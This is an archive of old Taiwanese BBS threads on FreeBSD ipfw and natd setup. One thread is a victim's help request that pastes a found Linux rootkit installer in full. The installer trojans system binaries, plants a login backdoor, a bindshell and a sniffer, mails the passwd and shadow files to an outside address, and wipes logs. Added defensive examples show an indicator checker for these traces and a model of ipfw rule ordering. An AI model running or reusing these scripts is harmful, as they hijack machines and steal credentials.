: fxp1 : internal
: Just write these four lines in rc.firewall and delete everything else (mind the location of ipfw)
: /sbin/ipfw -f flush
: /sbin/ipfw add divert natd all from any to any via fxp0
: /sbin/ipfw add pass all from any to any
: /sbin/ipfw add 65534 allow all from any to any
: From your rc.conf I can tell this line is already run at boot
: >$natd -interface fxp0
: In natd.conf write only the line below (if you do not need port redirect)
: dynamic
: After the change there is no need to reboot
: Run natd -interface fxp0 and you can try it
: >i has test my card .run fxp1 ping fxp0 can't ping .how can i do ??
: >help!!!!
  rc.firewall does not need to be touched...
  /etc/rc.conf
  natd_interface=fxp0
  natd_enable=YES
  firewall_enable=yes
  firewall_type=open
  gateway_enable=yes
  That should be enough...
--
※ Origin: 臺大電機 Maxwell 站 ◆ From: 139.223.87.135









Hmm, the system seems to have been cracked...

 

--------------------------------------------------------------------------------



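        A few days ago I suddenly found a file called la.tgz in / ..
-r--------   1 root     root       384575 Aug 15 16:33 la.tgz
        but I did not deal with it right away.
        Today I unpacked it to have a look...
        and found the things below..
        Since I am still not very familiar with the whole linux system,
        all I noticed is that he seems to have changed my syslogd...
        From the date this file appeared onwards, all of the /var/log/secure.* logs
        have no content at all,
        while the earlier ones are all still normal....:(
        Below are the contents of some of the shell files in that archive.
        Can anyone tell me what on earth happened?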



-rw-r--r--   1 root     root       321888 Aug 14 06:41 bds.tgz

drwxr-xr-x   2 root     root         4096 Aug 13 13:40 bindshell

-rw-r--r--   1 root     root          393 Aug 13 18:07 bnc.sh

-rwxr-xr-x   1 root     root        21156 Jul 30 17:38 in.identd

-rw-r--r--   1 root     root         4100 Aug 15 15:57 install.sh

-r-s--x--x   1 root     root        71335 Aug 13 14:12 login

drwxr-xr-x   2 root     root         4096 Jul 31 02:40 pty

-rw-r--r--   1 root     root         5374 Aug 14 12:30 secure.sh



bindshell directory:

================

-rw-r--r--   1 501      staff         359 Aug 14 11:33 bindshell.sh

-rwxr-xr-x   1 root     root        12105 Jul 28 13:48 inetd

-rwxr-xr-x   1 root     root        16015 Jul 28 13:52 rsz



Also, the pty directory is empty....

Below is part of install.sh

========================

#!/bin/sh

unset HISTFILE

killall -9 -q syslogd

clear

echo "#######################################################################"

echo "#######################################################################"

echo "#### distribute and i will kill you.                               ####"

echo "#### note: it will fuck up linux 2.0.*                             ####"

echo "#######################################################################"

echo "#######################################################################"

oldloc=`pwd`

if [ "$UID" != 0 ] ; then

echo "#### you st00pid monkeyass, you gotta be root to run this!         ####"

echo "#######################################################################"

exit 0

fi

if [ -d /dev/ttyyy ] ; then

echo "### aborting...                                                   ####"

echo "#######################################################################"

exit 0

fi

killall -9 -q bnc

killall -9 -q minegtty

killall -9 -q sniff

rm -rf /dev/ttyyy

mkdir /dev/ttyyy

echo "#### backdooring stuff..                                           ####"

touch -r /bin/login login

chattr -isa /bin/login

rm -f /bin/login

mv login /bin/login

chmod 000 /bin/login

chmod a+x /bin/login

chmod u+sr /bin/login

tar zxf bds.tgz

rm -rf bds.tgz

cd bds

touch -acmr /bin/ps ps

touch -acmr /bin/ls ls

touch -acmr /bin/netstat netstat

touch -acmr /usr/bin/find find

touch -acmr /usr/bin/top top

touch -acmr /usr/bin/pstree pstree

touch -acmr /usr/bin/find find

if [ -f /usr/bin/show ] ; then

touch -acmr /usr/bin/show show

chattr -isa /usr/bin/show

mv -f show /usr/bin/show

chmod +x /usr/bin/show

fi

if [ -f /usr/sbin/syslogd ] ; then

touch -acmr /usr/sbin/syslogd syslogd

chattr -isa /usr/sbin/syslogd

mv -f syslogd /usr/sbin/syslogd

chmod +x /usr/sbin/syslogd

else

touch -acmr /sbin/syslogd syslogd

chattr -isa /sbin/syslogd

mv -f syslogd /sbin/syslogd

chmod +x /sbin/syslogd

fi

touch -acmr /usr/sbin/tcpd tcpd

touch -acmr /sbin/ifconfig ifconfig

chattr -isa /bin/ps

mv -f ps /bin/ps

chattr -isa /bin/netstat

mv -f netstat /bin/netstat

chattr -isa /usr/bin/top

mv -f top /usr/bin/top

chattr -isa /bin/ls

mv -f ls /bin/ls

chattr -isa /usr/bin/find

mv -f find /usr/bin/find

chattr -isa /usr/bin/pstree

mv -f pstree /usr/bin/pstree

chattr -isa /usr/sbin/tcpd

mv -f tcpd /usr/sbin/tcpd

chattr -isa /sbin/ifconfig

mv -f ifconfig /sbin/ifconfig

cd ..

rm -rf bds

chmod +x /bin/ps

chmod +x /bin/netstat

chmod +x /usr/bin/top

chmod +x /bin/ls

chmod +x /usr/bin/find

chmod +x /usr/bin/pstree

chmod +x /usr/sbin/tcpd

chmod +x /sbin/ifconfig

echo "#### done backdooring.                                             ####"

echo "#### setting up a bindshell..                                      ####"

cd bindshell

sh bindshell.sh

cd ..

echo "#### done setting up bindshell, now setting up a sniffer..         ####"

mv sniff /dev/ttyyy/sniff

chmod +x /dev/ttyyy/sniff

cd /dev/ttyyy

./sniff &

cd $oldloc

mv -f pty/* /dev/

echo "#### enabling telnet/disabling auth...                             ####"

sed "s/^#telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^# telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^auth/#auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^ auth/# auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

killall -9 -q in.identd

killall -9 -q identd

mv -f in.identd /usr/sbin/in.identd

chmod 000 /usr/sbin/in.identd

chmod +x /usr/sbin/in.identd

killall -HUP inetd

/usr/sbin/in.identd -s

cat /etc/rc.d/rc.local > /tmp/rc.local; echo "/usr/sbin/in.identd -s" >> /tmp/rc.local ; touch -acmr /etc/rc.d/rc.local /tmp/rc.local; mv -f /tmp/rc.local /etc/rc.d/rc.local

mkdir /dev/...

echo "root:m00" > /dev/.../id

sh bnc.sh

echo "#### securing now...                                               ####"

sh secure.sh



Below is the bnc.sh part

=====================

mkdir -p /dev/ttyyy/bnc

mv -f bnc /dev/ttyyy/bnc/bnc

bncport=27686

bncpass=s3ct0r

bncusers=0

bncdefport=6667

echo "pt:$bncport" > /dev/ttyyy/bnc/bnc.conf

echo "ps:$bncpass" >> /dev/ttyyy/bnc/bnc.conf

echo "mu:$bncusers" >> /dev/ttyyy/bnc/bnc.conf

echo "dp:$bncdefport" >> /dev/ttyyy/bnc/bnc.conf

chmod 700 /dev/ttyyy/bnc/bnc

cd /dev/ttyyy/bnc

./bnc bnc.conf 1>/dev/null 2>/dev/null

cd $oldloc



Next is the secure.sh part

==========================

#!/bin/sh

oldloc=`pwd`

cd /etc

cp inetd.conf /dev/ttyyy/inetd.conf

grep -v pop-2 inetd.conf > stop.pop

touch -r inetd.conf stop.pop

mv -f stop.pop inetd.conf

echo "#### removing the users you added..                                ####"

grep -v sectr passwd > passwd.out

touch -r passwd passwd.out

mv -f passwd.out passwd

grep -v sector passwd > passwd.out

touch -r passwd passwd.out

mv -f passwd.out passwd

if [ -f /etc/shadow ] ; then

 grep -v sectr shadow > shadow.out

 touch -r shadow shadow.out

 mv -f shadow.out shadow

 grep -v sector shadow > shadow.out

 touch -r shadow shadow.out

 mv -f shadow.out shadow

fi

cd $oldloc

echo "#### patching the box from local vulnerabilities...                ####"

if [ -f /usr/sbin/userhelper ] ; then

 chmod u-s /usr/sbin/userhelper

fi

if [ -f /usr/bin/man ] ; then

 chmod 700 /usr/bin/man

fi

if [ -f /usr/bin/suidperl ] ; then

 chmod u-s /usr/bin/suidperl

fi

if [ -f /var/spool/lpd/lp/.config ] ; then

 chmod 700 /var/spool/lpd/lp/.config

fi

if [ -f /etc/ld.so.preload ] ; then

 chmod 700 /etc/ld.so.preload

fi

if [ -f /usr/X11R6/bin/xterm ] ; then

 chmod 700 /usr/X11R6/bin/xterm

fi

if [ -f /usr/bin/inews ] ; then

 chmod 700 /usr/bin/inews

fi

if [ -f /usr/bin/crontab ] ; then

 chmod 700 /usr/bin/crontab

fi

if [ -f /usr/local/bin/acushop/.sbstart ] ; then

 chmod 700 /usr/local/bin/acushop/.sbstart

fi

if [ -f /sbin/smbmount ] ; then

 chmod 700 /sbin/smbmount

fi

if [ -f /usr/libexec/pt_chown ] ; then

 chmod 700 /usr/libexec/pt_chown

fi

if [ -f /usr/bin/xvcad/dxfin ] ; then

 chmod 700 /usr/bin/xvcad/dxfin

fi

if [ -f /usr/sbin/amq ] ; then

 chmod 700 /usr/sbin/amq

fi

if [ -f /usr/bin/zgv ] ; then

 chmod 700 /usr/bin/zgv

if [ -f /etc/ftpaccess ] ; then

 echo "#### disabling anonymous ftp..                                     ####"

 grep -v anonymous /etc/ftpaccess > /tmp/ftpaccess

 echo "class   all   real,guest *" >> /tmp/ftpaccess

 touch -acmr /etc/ftpaccess /tmp/ftpaccess

 rm -rf /etc/ftpaccess

 mv -f /tmp/ftpaccess /etc/ftpaccess

fi



grep -v ingreslock /etc/services > /tmp/services

touch -acmr /etc/services /tmp/services

mv -f /tmp/services /etc/services

grep -v sunrpc /etc/services > /tmp/services

touch -acmr /etc/services /tmp/services

mv -f /tmp/services /etc/services



rm -rf /var/named/ADMROCKS

killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null

killall -9 nmbd snmpd ypasswd rpc.yppasswdd 1>/dev/null 2>/dev/null

killall -9 rpc.yppasswdd rpc.statd 1>/dev/null 2>/dev/null

ps -aux | grep amd | grep -v grep | awk '{print "kill -9 "$2""}' > kill

ps -aux | grep ipop | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

ps -aux | grep auto | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

ps -aux | grep named | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

chmod 700 kill

./kill

rm -rf kill

grep -v 9704 /etc/inetd.conf > /tmp/inetd ; touch -acmr /etc/inetd.conf /tmp/inetd ; mv -f /tmp/inetd /etc/inetd.conf

echo "#### mailing the box info to you...                                ####"

echo "" > owned

echo "* CPU Info:" >> owned

echo "" >> owned

cat /proc/cpuinfo >> owned

echo "" >> owned

echo "" >> owned

echo "* SYS Info:" >> owned

echo "" >> owned

uname -a >> owned

uptime >> owned

echo "" >> owned

echo "" >> owned

echo "* MEM Info:" >> owned

echo "" >> owned

cat /proc/meminfo >> owned

echo "" >> owned

echo "" >> owned

echo "* NET Info:" >> owned

echo "" >> owned

/sbin/ifconfig >> owned

echo "" >> owned

echo "" >> owned

echo "* HOST Info:" >> owned

echo "" >> owned

hostname >> owned

echo "" >> owned

echo "" >> owned

if [ -f /root/.bash_history ] ; then

 echo "* HISTORY File (/root):" >> owned

 echo "" >> owned

 cat /root/.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

if [ -f /.bash_history ] ; then

 echo "* HISTORY File (/):" >> owned

echo "" >> owned

 cat /.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

if [ -f /tmp/.bash_history ] ; then

 echo "* HISTORY File (/tmp):" >> owned

echo "" >> owned

 cat /tmp/.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

echo "* INETD Config:" >> owned

echo "" >> owned

cat /etc/inetd.conf >> owned

echo "" >> owned

echo "" >> owned

echo "* PASSWD File:" >> owned

echo "" >> owned

cat /etc/passwd >> owned

echo "-" >> owned

echo "-" >> owned

if [ -f /etc/shadow ] ; then

 echo "* SHADOW File:" >> owned

echo "" >> owned

 cat /etc/shadow >> owned

 echo "" >> owned

 echo "" >> owned

fi

echo "*********************** EOF ***********************" >> owned

cat owned | mail -s rewt sec0wnz@yahoo.com

rm -f owned

echo "#### cleaning logs...                                              ####"

cd /var/log

:>wtmp 1>/dev/null 2>/dev/null

:>utmp 1>/dev/null 2>/dev/null

:>lastlog 1>/dev/null 2>/dev/null

:>messages 1>/dev/null 2>/dev/null

:>maillog 1>/dev/null 2>/dev/null

:>secure 1>/dev/null 2>/dev/null

:>xferlog 1>/dev/null 2>/dev/null

cd $oldloc

if [ -f /.bash_history ] ; then

 rm -rf /.bash_history

fi

if [ -f /tmp/.bash_history ] ; then

 rm -rf /tmp/.bash_history

fi

echo "" > /root/.bash_history

cd ..

rm -rf lala.tgz

rm -rf lala

if [ -f /usr/sbin/syslogd ] ; then

/usr/sbin/syslogd

else

/sbin/syslogd

fi

killall -HUP inetd

echo "#### heh, done.                                                    ####"

echo "#######################################################################"

echo "#######################################################################"





Contents of bindshell.sh

=====================

#!/bin/sh

chattr -isa /usr/sbin/inetd

rm -rf /usr/bin/inetd

cp -f /usr/sbin/inetd /usr/bin/inetd

rm -rf /usr/sbin/inetd

mv minegtty /sbin/minegtty

touch -acmr /usr/bin/inetd inetd

mv inetd /usr/sbin/inetd

chmod +x /sbin/minegtty

chmod +x /usr/sbin/inetd

chmod +x rsz

./rsz -t /usr/bin/inetd /usr/sbin/inetd > /dev/null

killall -9 -q inetd

/usr/sbin/inetd

--

☆ [Origin: 椰林風情] [From: 140.112.198.1] [Login: **] [Post: 27]
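
Added example, not part of the original post: a read-only check for the traces the scripts above leave behind. Every path and string it looks for is taken from the listings in the post; the function name and the ROOT argument are assumptions made for this example. Because the post shows ls, find and ps being replaced, run it from trusted rescue media against the mounted disk.

```shell
#!/bin/sh
# Added example. Indicator paths and strings come from the install.sh, bnc.sh and
# bindshell.sh listings in the post; ROOT (hypothetical) is where the suspect
# file system is mounted, e.g. from rescue media. Empty ROOT means the live system.
check_rootkit_traces() {
    root="${1:-}"
    hits=0

    # Directories the installer creates under /dev
    for d in /dev/ttyyy /dev/...; do
        if [ -d "$root$d" ]; then
            echo "DIR   $d"
            hits=$((hits + 1))
        fi
    done

    # Files the scripts drop or relocate
    for f in /dev/ttyyy/sniff /dev/ttyyy/bnc/bnc.conf /dev/.../id \
             /sbin/minegtty /usr/bin/inetd; do
        if [ -e "$root$f" ]; then
            echo "FILE  $f"
            hits=$((hits + 1))
        fi
    done

    # Boot persistence appended to rc.local
    rc="$root/etc/rc.d/rc.local"
    if [ -f "$rc" ] && grep -q '^/usr/sbin/in\.identd -s$' "$rc"; then
        echo "BOOT  /etc/rc.d/rc.local starts in.identd -s"
        hits=$((hits + 1))
    fi

    # Weak signal on its own: telnet enabled while auth is commented out
    ic="$root/etc/inetd.conf"
    if [ -f "$ic" ] && grep -q '^telnet' "$ic" && grep -q '^# *auth' "$ic"; then
        echo "CONF  /etc/inetd.conf: telnet enabled, auth commented out"
        hits=$((hits + 1))
    fi

    echo "$hits indicator(s) found"
    [ "$hits" -eq 0 ]   # exit status 0 only when nothing matched
}
```

A clean result does not clear the host: the installer preserves timestamps with `touch -acmr` and swaps system binaries, so compare those binaries against known-good package checksums as well.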









Has the way to set up NAT changed in 4.2-RELEASE??

 

--------------------------------------------------------------------------------



==> In the article by seawolf.bbs@bbs.cs.nthu.edu.tw (海狼):

>Following the 4.0 approach, I added the following lines to /etc/rc.conf

>firewall_enable="YES"           # Set to YES to enable firewall functionality

>firewall_script="/etc/rc.firewall" # Which script to run to set up the firewall



The contents of /etc/rc.firewall are the following four lines



/sbin/ipfw -f flush

/sbin/ipfw add 100 divert natd all from any to any via de0

/sbin/ipfw add 200 pass all from any to any

/sbin/ipfw add 65534 allow all from any to any



>firewall_type="OPEN"            # Firewall type (see /etc/rc.firewall)

>firewall_quiet="NO"             # Set to YES to suppress rule display

>firewall_logging="NO"           # Set to YES to enable events logging

>firewall_flags=""               # Flags passed to ipfw when type is a file

>natd_program="/sbin/natd"       # path to natd, if you want a different one.

>natd_enable="YES"               # Enable natd (if firewall_enable == YES).

>natd_interface="fxp0"           # Public interface or IPaddress to use.

>natd_flags=""                   # Additional flags for natd.

Change it to

natd_flags="-f /etc/natd.conf"

Then /etc/natd.conf (NAT only, no other controls)

dynamic (only one line; useful if more features need to be added later)

Otherwise just change it to natd_flags="-dynamic" and that will do



Also remember to change rc.firewall



>gateway_enable="YES"            # Set to YES if this host will be a gateway.

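>But at startup this appeared:

>ipfw: getsockopt(IP_FW_ADD): Invalid argument

>as a message,

>and after that all the internal IPs work normally,

>the server and the clients can all ping each other,

>but the client machines can no longer get out; only the server works normally.

>In man natd I saw a passage saying to add to /etc/rc.conf

>sysctl -w net.inet.ip.forwarding=1

>this line, but I really don't understand the syntax,

>and man sysctl doesn't mention it either.

>Do I need to modify something?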

--

* Origin: ¤¤¤s¤j¾Ç-¬üÄR¤§®qBBS * From: 211.22.182.202 [¤w³q¹L»{ÃÒ]









IPFW has confused my understanding

 

--------------------------------------------------------------------------------



==> In the article by "LOTUS" (lotus.wang@msa.hinet.net):

> A question for the veterans: rules are executed in order from the smallest number to the largest, so should I block first and then open, or open first and then block?

> My rc.firewall is below. It should be just a small concept, but I have gotten it mixed up. Could someone point me in the right direction?

> I have removed default_to_accept from the kernel:

> #rc.firewall:

> /sbin/ipfw -f flush #I can't explain this line

> /sbin/ipfw add divert natd all from any to any via vr0 #I don't understand this line :P

> /sbin/ipfw add 60000 pass all from any to any #60000 opens all channels

> /sbin/ipfw add 59990 deny tcp from any to any 21 #59990 closes all ftp channels

> /sbin/ipfw add 59980 deny tcp from any to any 23 #59980 closes the telnet channel

> /sbin/ipfw add 59970 pass tcp from 192.168.1.119 to any 23 #59970 opens the telnet channel for 192.168.1.119



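        The purpose of flush is initialization, that is, to discard all the current rules and define new ones.

        The divert line hands every packet that passes through the vr0 card to natd for processing.

        The four rules below, from smallest to largest, are

        1. telnet outward (including to itself) is allowed from 192.168.1.119

        2. all telnet packets are denied (1.+2. ==> only 192.168.1.119 can telnet outward)

        3. all ftp packets are denied

        4. any packet may pass



        The result is that any packet may pass, except that ftp is blocked and telnet is only allowed outward from 192.168.1.119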



--

        An ordinary user's ordinary signature, placed where an ordinary signature file ought to go, leaving you

        with an ordinary, vague impression of him...

--

 * Origin: ★ 交通大學資訊科學系 BBS ★ (bbs.cis.nctu.edu.tw: 140.113.23.3)
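
Added example, not part of either post: the rule ordering explained in the reply, modelled as a small first-match evaluator over the four numbered rules from the quoted rc.firewall. It adds ipfw's built-in final rule 65535 as deny (the poster removed default_to_accept) and leaves out the divert/natd step, so it assumes addresses are not rewritten. The function names and sample packets are constructed for this example.

```shell
#!/bin/sh
# Constructed model of ipfw first-match evaluation.
# Fields: number action proto src dst dport. Wildcards: "all" for proto, "any" elsewhere.
# The rules are listed in the order the quoted rc.firewall adds them.
RULES='60000 pass all any any any
59990 deny tcp any any 21
59980 deny tcp any any 23
59970 pass tcp 192.168.1.119 any 23'

# field_matches RULE_VALUE PACKET_VALUE [WILDCARD]
field_matches() {
    [ "$1" = "${3:-any}" ] || [ "$1" = "$2" ]
}

# ipfw_verdict PROTO SRC DST DPORT -> prints "<rule number> <action>"
ipfw_verdict() {
    # Rules are checked in ascending rule number, whatever order they were added in.
    { printf '%s\n' "$RULES"; echo '65535 deny all any any any'; } |
    sort -n |
    while read -r num action proto src dst dport; do
        field_matches "$proto" "$1" all || continue
        field_matches "$src" "$2" || continue
        field_matches "$dst" "$3" || continue
        field_matches "$dport" "$4" || continue
        echo "$num $action"   # the first matching rule decides; stop searching
        break
    done
}

# Constructed sample packets:
#   ipfw_verdict tcp 192.168.1.119 203.0.113.10 23
#   ipfw_verdict tcp 192.168.1.50  203.0.113.10 23
```

So the narrow exception gets the lowest number and the broad pass rule the highest; swapping the numbers of rules 59970 and 59980 would deny telnet for every source.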




Page last updated: Sunday, 03-Nov-2002 21:10:37 HKT